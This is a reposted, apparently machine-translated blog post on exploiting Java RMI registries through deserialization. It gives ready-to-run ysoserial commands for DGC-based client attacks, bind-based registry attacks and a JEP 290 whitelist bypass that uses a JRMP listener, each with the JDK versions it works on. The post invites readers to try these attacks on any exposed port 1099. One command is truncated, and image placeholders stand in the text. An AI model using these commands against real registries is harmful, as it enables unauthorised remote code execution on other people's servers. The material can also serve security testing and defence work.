current position:Home>Java RMI register deserialization attack

Java RMI register deserialization attack

2022-01-27 00:41:50 Shanfenglan7

1. Preface

What was attacked was rmi register Server side , Generally in 1099 port . If you meet an exposed 1099 Port can try to attack .

2. utilize

Don't worry about reporting mistakes , The command will execute normally
Don't worry about reporting mistakes , The command will execute normally


2.1 Client attack registry

This is a way for clients to attack the service center , The principle is RMI Frame adoption DGC(Distributed Garbage Collection) Distributed garbage collection mechanism to manage the life cycle of remote objects , It can be done through DGC Send malicious messages by means of communication payload Let the registry deserialize .

Conditions jdk<=jdk8u111

java -cp ysoserial.jar ysoserial.exploit.JRMPClient 192.168.171.139 1099 CommonsCollections6 "touch 

2.2 The server attacks the registry

The server needs to bind the class it wants to register to the registry , You can send deserialized data directly to the registry , This can lead to a deserialization vulnerability .

# Use bind The way to bind malicious payload The attack , Deserialized direct execution chain command .
Conditions jdk<=jdk8u111

java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 CommonsCollections6 "touch /tmp/123"  

2.3 Bypass the white list limit

This restriction is also called jep290,JDK Respectively RMI Registry and RMI The distributed garbage collector provides corresponding built-in filters . Both filters are configured as white lists , That is, only certain classes are allowed to be deserialized .

jdk8u232_b09 Version has whitelist restrictions on deserialized classes :

 Insert picture description here

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections6 "touch /tmp/123"
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit2 192.168.171.139 1099 192.168.171.1 12345

Conditions jdk<=jdk8u232_b09

 Insert picture description here

 Insert picture description here

Special version required ysoserial, Refer to the following article for details :

https://github.com/JoyChou93/java-sec-code/wiki/Java-RMI

Reference article

https://github.com/JoyChou93/java-sec-code/wiki/Java-RMI
https://blog.csdn.net/qsort_/article/details/104874111
http://www.codersec.net/2018/09/%E4%B8%80%E6%AC%A1%E6%94%BB%E5%87%BB%E5%86%85%E7%BD%91rmi%E6%9C%8D%E5%8A%A1%E7%9A%84%E6%B7%B1%E6%80%9D/
https://paper.seebug.org/1194/#_7

copyright notice
author[Shanfenglan7],Please bring the original link to reprint, thank you.
https://en.cdmana.com/2022/01/202201270041480378.html

Random recommended